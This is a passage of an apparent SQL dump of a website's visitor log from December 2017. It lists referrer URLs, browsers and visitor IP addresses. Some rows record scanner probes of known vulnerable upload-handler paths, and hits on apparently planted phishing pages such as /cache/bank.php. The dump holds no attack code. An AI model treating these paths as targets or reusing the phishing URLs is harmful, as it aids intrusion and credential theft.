c0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3piVzFDeGp4REtlU1VSdVhtZmcxeDR1bnpDd0NMOXplVlZSeHJ4RXRMcjVx&b64e=2&sign=f2cfb901786c3f5bf5af3ea99ca992b4&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQe3IrxbPWIv4QSqulNULMjGyCvdH6k3oiEt_f8A2fljQ66yg_AqcJctkVm8BIm_WxgoZD1r4UndxL1v1E7KIwYeMDywGykade4sa1SKGOIJRVAbH6-q6gs0m3LjE5S0xxw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs3pNQr-qgMLvHzQbj4xoPbTTMysOE6SY2FaepzWPuKuYHqTXg3ys2sLpJrv6fq-X_w&l10n=ru&cts=1513252561381&mc=7.27382315318','ok','Unknown','3.3.0','','93.80.235.228','000',2,0),(15439,'2017-12-14','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','52.41.19.35','000',2,0),(15440,'2017-12-14','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','183.111.174.36','000',2,0),(15441,'2017-12-14','https://zphiblgz.org','MSIE','Windows','11.0','','66.102.8.32','000',1,0),(15442,'2017-12-14','https://zphiblgz.org','MSIE','Windows','11.0','','66.102.8.42','000',1,0),(15443,'2017-12-14','https://zphiblgz.org','MSIE','Windows','11.0','','159.142.31.92','000',4,0),(15444,'2017-12-14','https://zphiblgz.org','Chrome','Windows','24.0.1290.1','','185.117.118.195','000',3,0),(15445,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.210.37.82','000',1,0),(15446,'2017-12-14','https://zphiblgz.org','Chrome','Windows','58.0.3029.110','','82.202.249.91','000',3,0),(15447,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','116.249.34.119','000',1,0),(15448,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','121.57.8.0','000',1,0),(15449,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','64.27.17.140','000',2,0),(15450,'2017-12-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.38.14.171','000',1,0),(15451,'2017-12-14','http://www.zphiblgz.org/theme/assets/global/plugins/jquery-file-upload/server/php/','Chrome','Windows','42.0.2311.152','','207.244.157.138','000',3,0),(15452,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.220.101.0','000',2,0),(15453,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.168','000',1,0),(15454,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(15455,'2017-12-14','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','5.62.56.62','000',6,0),(15456,'2017-12-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(15457,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','89.234.157.254','000',1,0),(15458,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','185.100.86.154','000',2,0),(15459,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','204.8.156.142','000',2,0),(15460,'2017-12-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','176.31.180.157','000',1,0),(15461,'2017-12-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(15462,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','35.182.58.85','000',1,0),(15463,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','18.195.226.88','000',1,0),(15464,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','35.177.81.144','000',2,0),(15465,'2017-12-14','https://zphiblgz.org','Safari','iPhone','9.0','','35.182.4.204','000',1,0),(15466,'2017-12-14','https://zphiblgz.org','Safari','Macintosh','9.1.2','','73.172.62.63','000',11,0),(15467,'2017-12-14','https://www.facebook.com/','Firefox','Windows','57.0','','160.253.0.114','000',4,0),(15468,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(15469,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.136.98','000',1,0),(15470,'2017-12-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.208.134','000',1,0),(15471,'2017-12-14','https://www.google.com/','Chrome','Macintosh','63.0.3239.84','','73.135.240.26','000',7,0),(15472,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','193.15.16.4','000',1,0),(15473,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.76.142','000',1,0),(15474,'2017-12-14','https://www.google.com/','Chrome','Windows','63.0.3239.84','','104.192.9.108','000',3,0),(15475,'2017-12-14','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','69.89.31.246','000',2,0),(15476,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','192.42.116.16','000',1,0),(15477,'2017-12-14','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(15478,'2017-12-14','http://zphiblgz.org/','MSIE','Windows','11.0','','104.160.21.134','000',1,0),(15479,'2017-12-14','(null)','Firefox','Windows','33.0','','138.197.202.197','000',1,0),(15480,'2017-12-14','(null)','Firefox','Windows','33.0','','159.203.196.79','000',1,0),(15481,'2017-12-14','https://zphiblgz.org','Firefox','Windows','33.0','','159.203.42.143','000',1,0),(15482,'2017-12-14','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(15483,'2017-12-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',2,0),(15484,'2017-12-14','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.128.239.206','000',13,0),(15485,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','163.172.45.46','000',1,0),(15486,'2017-12-14','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',3,0),(15487,'2017-12-14','https://zphiblgz.org/','Safari','iPad','11.0','','71.121.204.212','000',2,0),(15488,'2017-12-14','https://zphiblgz.org','Android Browser','Android','4.0','','182.251.240.12','000',1,0),(15489,'2017-12-14','http://zphiblgz.org/tag/%E5%8D%B0%E7%AB%A0%E6%8C%81%E3%81%A1%E3%81%AE%E3%83%92%E3%83%88%E3%83%87/','Android Browser','Android','4.0','','106.132.137.119','000',1,0),(15490,'2017-12-14','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.23','000',2,0),(15491,'2017-12-14','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','103.67.235.35','000',2,0),(15492,'2017-12-15','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',399,0),(15493,'2017-12-15','https://zphiblgz.org','MSIE','Windows','6.0','','77.122.68.158','000',2,0),(15494,'2017-12-15','http://m.facebook.com','AppleWebKit','iPhone','604.1.38','','131.118.76.88','000',2,0),(15495,'2017-12-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',1,0),(15496,'2017-12-15','https://zphiblgz.org','MSIE','Windows','7.0','','39.110.234.119','000',1,0),(15497,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(15498,'2017-12-15','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.61.152.26','000',2,0),(15499,'2017-12-15','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.12.201','000',2,0),(15500,'2017-12-15','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(15501,'2017-12-15','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.210.130.228','000',2,0),(15502,'2017-12-15','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.208.94.162','000',1,0),(15503,'2017-12-15','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(15504,'2017-12-15','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.101.234','000',1,0),(15505,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.15','000',2,0),(15506,'2017-12-15','https://zphiblgz.org/scholarship/recommendation/','MSIE','Windows','9.0','','204.79.180.3','000',2,0),(15507,'2017-12-15','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','212.227.114.117','000',2,0),(15508,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.0','000',2,0),(15509,'2017-12-15','https://zphiblgz.org/service/','MSIE','Windows','9.0','','204.79.180.22','000',1,0),(15510,'2017-12-15','https://zphiblgz.org','Firefox','Windows','34.0','','188.170.198.251','000',1,0),(15511,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.19','000',1,0),(15512,'2017-12-15','https://zphiblgz.org','Firefox','Windows','12.0','','78.46.156.169','000',2,0),(15513,'2017-12-15','https://zphiblgz.org','Firefox','Windows','34.0','','84.53.198.217','000',1,0),(15514,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.9','000',1,0),(15515,'2017-12-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(15516,'2017-12-15','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','73.181.3.80','000',1,0),(15517,'2017-12-15','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(15518,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.1','000',1,0),(15519,'2017-12-15','http://zphiblgz.org/','Safari','Macintosh','10.1.1','','163.172.4.153','000',1,0),(15520,'2017-12-15','https://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','163.172.4.153','000',1,0),(15521,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.18','000',1,0),(15522,'2017-12-15','https://zphiblgz.org','Chrome','Windows','61.0.3163.100','','54.90.248.165','000',2,0),(15523,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.12','000',1,0),(15524,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.5','000',1,0),(15525,'2017-12-15','https://www.google.com/','Chrome','Android','62.0.3202.84','','166.216.165.24','000',2,0),(15526,'2017-12-15','http://zphiblgz.org/ts_teams/w-ruth-conway/','Chrome','Android','62.0.3202.84','','107.77.203.67','000',4,0),(15527,'2017-12-15','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.8','000',1,0),(15528,'2017-12-15','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.85.132','000',2,0),(15529,'2017-12-15','https://zphiblgz.org','MSIE','Windows','11.0','','185.117.74.118','000',5,0),(15530,'2017-12-16','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',555,0),(15531,'2017-12-16','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(15532,'2017-12-16','https://zphiblgz.org','MSIE','Windows','6.0','','176.111.72.247','000',1,0),(15533,'2017-12-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.146','000',2,0),(15534,'2017-12-16','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','31.22.4.4','000',4,0),(15535,'2017-12-16','https://zphiblgz.org','MSIE','Windows','6.0','','65.19.167.130','000',1,0),(15536,'2017-12-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.166','000',2,0),(15537,'2017-12-16','https://zphiblgz.org','MSIE','Windows','7.0','','83.31.68.63','000',1,0),(15538,'2017-12-16','https://zphiblgz.org','MSIE','Windows','8.0','','83.31.68.63','000',1,0),(15539,'2017-12-16','https://zphiblgz.org','Firefox','Macintosh','3.5.3','','193.128.114.40','000',1,0),(15540,'2017-12-16','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.164','000',2,0),(15541,'2017-12-16','https://zphiblgz.org','Safari','iPhone','9.0','','180.213.109.192','000',1,0),(15542,'2017-12-16','https://zphiblgz.org','Safari','iPhone','9.0','','223.14.182.245','000',1,0),(15543,'2017-12-16','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','95.85.8.153','000',1,0),(15544,'2017-12-16','https://zphiblgz.org','FS','Unknown','Unknown','','95.85.8.153','000',1,0),(15545,'2017-12-16','https://zphiblgz.org','Chrome','Windows','15.0.874.121','','95.85.8.153','000',2,0),(15546,'2017-12-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.23','000',1,0),(15547,'2017-12-16','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','192.81.222.72','000',1,0),(15548,'2017-12-16','http://zphiblgz.org/cache/bank.php','MSIE','Windows','10.0','','46.101.119.24','000',22,0),(15549,'2017-12-16','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',22,0),(15550,'2017-12-16','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','173.239.240.128','000',4,0),(15551,'2017-12-16','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','46.101.94.163','000',2,0),(15552,'2017-12-16','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','15.15063','','173.239.221.135','000',2,0),(15553,'2017-12-16','https://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','87.112.139.194','000',2,0),(15554,'2017-12-16','http://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php','MSIE','Windows','10.0','','85.248.227.165','000',1,0),(15555,'2017-12-16','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','173.239.221.135','000',1,0),(15556,'2017-12-16','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Android','34.0.1847.114','','46.101.94.163','000',1,0),(15557,'2017-12-16','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','31.185.27.201','000',1,0),(15558,'2017-12-16','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.12.201','000',1,0),(15559,'2017-12-16','https://zphiblgz.org','curl','Unknown','7.35.0','','52.58.51.176','000',2,0),(15560,'2017-12-16','https://zphiblgz.org','MSIE','Windows','7.0','','104.245.34.171','000',1,0),(15561,'2017-12-16','http://zphiblgz.org/cache/hot18/a9vjkmpjwjzcjpokn04mbtwf.php','MSIE','Windows','10.0','','162.247.72.217','000',1,0),(15562,'2017-12-16','https://zphiblgz.org','curl','Unknown','7.25.0','','59.160.150.117','000',2,0),(15563,'2017-12-16','https://zphiblgz.org','Firefox','Windows','38.0','','54.196.210.225','000',1,0),(15564,'2017-12-16','http://zphiblgz.org/cache/hot18/ni0xjc0huahjyvrzar8al37o.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','5.196.66.162','000',1,0),(15565,'2017-12-16','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.175.239.41','000',2,0),(15566,'2017-12-16','https://zphiblgz.org','Safari','iPhone','11.0','','69.143.35.179','000',10,0),(15567,'2017-12-16','https://google.com','Firefox','Linux','26.0','','37.59.4.151','000',2,0),(15568,'2017-12-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.111.9','000',21,0),(15569,'2017-12-16','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','192.166.219.38','000',1,0),(15570,'2017-12-16','https://zphiblgz.org','python-requests','Unknown','2.18.4','','35.161.55.221','000',1,0),(15571,'2017-12-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.25','000',1,0),(15572,'2017-12-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.28','000',1,0),(15573,'2017-12-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.18','000',1,0),(15574,'2017-12-16','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.29','000',1,0),(15575,'2017-12-16','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.196.40','000',1,0),(15576,'2017-12-16','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.139.222','000',1,0),(15577,'2017-12-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',1,0),(15578,'2017-12-16','https://zphiblgz.org','Safari','iPhone','9.0','','114.221.127.216','000',1,0),(15579,'2017-12-16','https://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.55','000',1,0),(15580,'2017-12-16','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.182.56.122','000',1,0),(15581,'2017-12-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(15582,'2017-12-16','http://zphiblgz.org/wp-content/themes/radial-theme/functions/upload-handler.php','Chrome','Windows','42.0.2311.152','','207.244.157.138','000',1,0),(15583,'2017-12-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','120.76.146.29','000',1,0),(15584,'2017-12-16','http://zphiblgz.org/wp-content/themes/bordeaux-theme/functions/upload-handler.php','Chrome','Windows','42.0.2311.152','','216.244.65.58','000',1,0),(15585,'2017-12-16','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(15586,'2017-12-16','https://zphiblgz.org','Chrome','Macintosh','53.0.2794.90','','46.161.9.3','000',1,0),(15587,'2017-12-16','https://zphiblgz.org','MSIE','Windows','11.0','','58.95.138.153','000',1,0),(15588,'2017-12-16','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(15589,'2017-12-16','http://l.facebook.com/l.php?u=http%3A%2F%2Fzphiblgz.org%2F&h=ATNaKJNgDhjGgzau-DGlnkaEnCu5dzr4_FLE4TOqAO_6q9DyTxN8cJ0dLvwITVGY2OMGGEhKstlPYku8V53Q4rfvBToTUXJZteM','AppleWebKit','iPhone','604.3.5','','108.45.74.102','000',3,0),(15590,'2017-12-16','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.234.241.251','000',1,0),(15591,'2017-12-16','https://zphiblgz.org','Firefox','Windows','36.0','','23.94.20.139','000',2,0),(15592,'2017-12-16','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1637.ETE9jPbiKCL3md0Ij0t8G0AGSoPh4yMCynF6Zcyq8U0OSLxog0qyodKD1_m5cCq8.8cfb83ef99aec291308fd0966fb6f1ee35bbda29&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVlE5M1MxRWZoT3pTNHdfR3NwS2Zid3pyeGRYdEtKWHNwRlljYmhWdEUtSGJHSS00ZzRqWDFl&b64e=2&sign=2eed1ab038439c9a4c6a528136066e59&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQXbYQp9t5VF6LeIJU_uZx1nfEVAWcUskLB708gdp8mEkdLPb3SmgMnYaYSFxZXCBFDu75gzJXTLktIpBCNGoFtihFlfx98d9gGogKkydedeX6Ih8YxKsjKVCFWRA2sOGDvXKHH7OwmOz&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWE0vFrzScna1ul1jqCKuN6FEMT8YZ5-GBBL1L07Q5kcK33vrDG0BZFW7gqrZJEtPHc0OXgFgNrSA&l10n=ru&cts=1513478276493&mc=6.37794658086','MSIE','Windows','8.0','','188.255.16.153','000',1,0),(15593,'2017-12-16','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','219.107.58.164','000',2,0),(15594,'2017-12-17','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',281,0),(15595,'2017-12-17','https://zphiblgz.org','Firefox','Windows','38.0','','54.227.8.195','000',1,0),(15596,'2017-12-17','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','108.56.247.227','000',2,0),(15597,'2017-12-17','https://zphiblgz.org','Edge','Windows','15.15063','','96.255.193.218','000',4,0),(15598,'2017-12-17','https://websearch.excite.co.jp/?q=%E5%86%B7%E8%94%B5%E5%BA%AB+%E3%83%AA%E3%83%99%E3%83%83%E3%83%88&num=10&page=3','Safari','iPad','11.0','','101.128.170.75','000',2,0),(15599,'2017-12-17','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.8','000',1,0),(15600,'2017-12-17','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.14','000',1,0),(15601,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.248.4.102','000',2,0),(15602,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.159','000',2,0),(15603,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.102.18.81','000',2,0),(15604,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.76.78.211','000',2,0),(15605,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.109.205.248','000',2,0),(15606,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.213','000',1,0),(15607,'2017-12-17','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','104.250.198.119','000',2,0),(15608,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','182.119.224.51','000',1,0),(15609,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','124.235.138.253','000',1,0),(15610,'2017-12-17','https://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.81','000',2,0),(15611,'2017-12-17','https://zphiblgz.org','MSIE','Windows','11.0','','101.110.34.1','000',1,0),(15612,'2017-12-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',1,0),(15613,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','79.172.193.32','000',1,0),(15614,'2017-12-17','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','213.251.182.110','000',2,0),(15615,'2017-12-17','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.11','000',1,0),(15616,'2017-12-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','92.63.91.79','000',3,0),(15617,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.183.218.199','000',2,0),(15618,'2017-12-17','https://zphiblgz.org','MSIE','Windows','8.0','','83.24.214.66','000',1,0),(15619,'2017-12-17','https://zphiblgz.org','Firefox','Windows','3.0.2.1','','83.24.214.66','000',1,0),(15620,'2017-12-17','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.65','000',2,0),(15621,'2017-12-17','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.9','000',1,0),(15622,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','217.170.197.83','000',2,0),(15623,'2017-12-17','https://zphiblgz.org','MailChimp','Unknown','Unknown','','104.196.139.222','000',2,0),(15624,'2017-12-17','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','79.96.202.233','000',2,0),(15625,'2017-12-17','https://zphiblgz.org/','Opera Next','Windows','43.0.2442.1144','','178.159.37.31','000',2,0),(15626,'2017-12-17','https://zphiblgz.org','MSIE','Windows','7.0','','69.28.84.226','000',1,0),(15627,'2017-12-17','https://www.google.com/','Chrome','Android','63.0.3239.111','','71.121.171.120','000',3,0),(15628,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','212.83.40.239','000',1,0),(15629,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','23.129.64.102','000',2,0),(15630,'2017-12-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(15631,'2017-12-17','https://zphiblgz.org','Firefox','Windows','12.0','','5.9.106.81','000',2,0),(15632,'2017-12-17','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(15633,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','106.114.66.160','000',1,0),(15634,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','112.66.109.190','000',1,0),(15635,'2017-12-17','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.234.34.80','000',2,0),(15636,'2017-12-17','https://zphiblgz.org','Safari','Macintosh','11.0.2','','173.69.172.238','000',2,0),(15637,'2017-12-17','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','96.234.147.182','000',6,0),(15638,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','77.247.181.162','000',2,0),(15639,'2017-12-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','37.187.94.86','000',1,0),(15640,'2017-12-17','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.155.144','000',2,0),(15641,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','112.65.7.109','000',1,0),(15642,'2017-12-17','https://zphiblgz.org','Safari','iPhone','9.0','','106.114.68.62','000',1,0),(15643,'2017-12-17','https://zphiblgz.org','MSIE','Windows','10.0','','110.4.229.223','000',1,0),(15644,'2017-12-17','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.74','000',2,0),(15645,'2017-12-17','http://zphiblgz.org/','Firefox','Windows','7.0.1','','193.90.12.118','000',1,0),(15646,'2017-12-18','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',530,0),(15647,'2017-12-18','http://site.ru','Chrome','Windows','5.0.375.99','','114.215.170.194','000',1,0),(15648,'2017-12-18','http://site.ru','Chrome','Windows','5.0.375.99','','93.125.99.82','000',1,0),(15649,'2017-12-18','https://zphiblgz.org','Firefox','Linux','21.0','','37.187.56.81','000',45,0),(15650,'2017-12-18','http://site.ru','Chrome','Windows','5.0.375.99','','50.87.70.146','000',1,0),(15651,'2017-12-18','https://zphiblgz.org','Firefox','Windows','34.0','','95.78.56.30','000',1,0),(15652,'2017-12-18','https://zphiblgz.org','curl','Unknown','7.29.0','','93.39.201.69','000',4,0),(15653,'2017-12-18','https://zphiblgz.org','ImplisenseBot','Unknown','Unknown','','94.130.14.247','000',7,0),(15654,'2017-12-18','https://zphiblgz.org','Chrome','Windows','49.0.2623.112','','211.133.94.127','000',2,0),(15655,'2017-12-18','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.63.7','000',2,0),(15656,'2017-12-18','https://www.google.com/','Chrome','Windows','63.0.3239.84','','100.36.90.41','000',4,0),(15657,'2017-12-18','https://zphiblgz.org','Firefox','Windows','57.0','','100.36.90.41','000',4,0),(15658,'2017-12-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',3,0),(15659,'2017-12-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','62.210.177.87','000',2,0),(15660,'2017-12-18','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(15661,'2017-12-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','62.210.180.142','000',2,0),(15662,'2017-12-18','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.5','000',1,0),(15663,'2017-12-18','https://zphiblgz.org','Firefox','Windows','40.1','','176.122.107.214','000',3,0),(15664,'2017-12-18','http://www.zphiblgz.org/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','Chrome','Windows','42.0.2311.152','','207.244.157.138','000',1,0),(15665,'2017-12-18','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','190.228.29.221','000',1,0),(15666,'2017-12-18','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.23','000',1,0),(15667,'2017-12-18','https://zphiblgz.org/ts_teams/nathalia-drew/','MSIE','Windows','9.0','','204.79.180.2','000',1,0),(15668,'2017-12-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','198.204.244.163','000',9,0),(15669,'2017-12-18','https://www.google.com/','Chrome','Windows','23.0.1271.64','','66.102.6.4','000',1,0),(15670,'2017-12-18','http://zphiblgz.org/cache/hot18/2e2uknaj9kbqqk5podntdrgo.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','23.0.1271.64','','66.102.6.12','000',1,0),(15671,'2017-12-18','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.249.88.67','000',1,0),(15672,'2017-12-18','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.249.88.72','000',1,0),(15673,'2017-12-18','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.249.88.70','000',1,0),(15674,'2017-12-18','https://zphiblgz.org/','Chrome','Android','62.0.3202.84','','66.249.88.74','000',1,0),(15675,'2017-12-18','https://www.google.com/','Chrome','Android','62.0.3202.84','','66.249.88.76','000',2,0),(15676,'2017-12-18','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.3','000',1,0),(15677,'2017-12-18','https://zphiblgz.org','python-requests','Unknown','2.18.2','','130.211.246.133','000',1,0),(15678,'2017-12-18','https://zphiblgz.org','Chrome','Windows','58.0.3029.110','','82.202.249.91','000',3,0),(15679,'2017-12-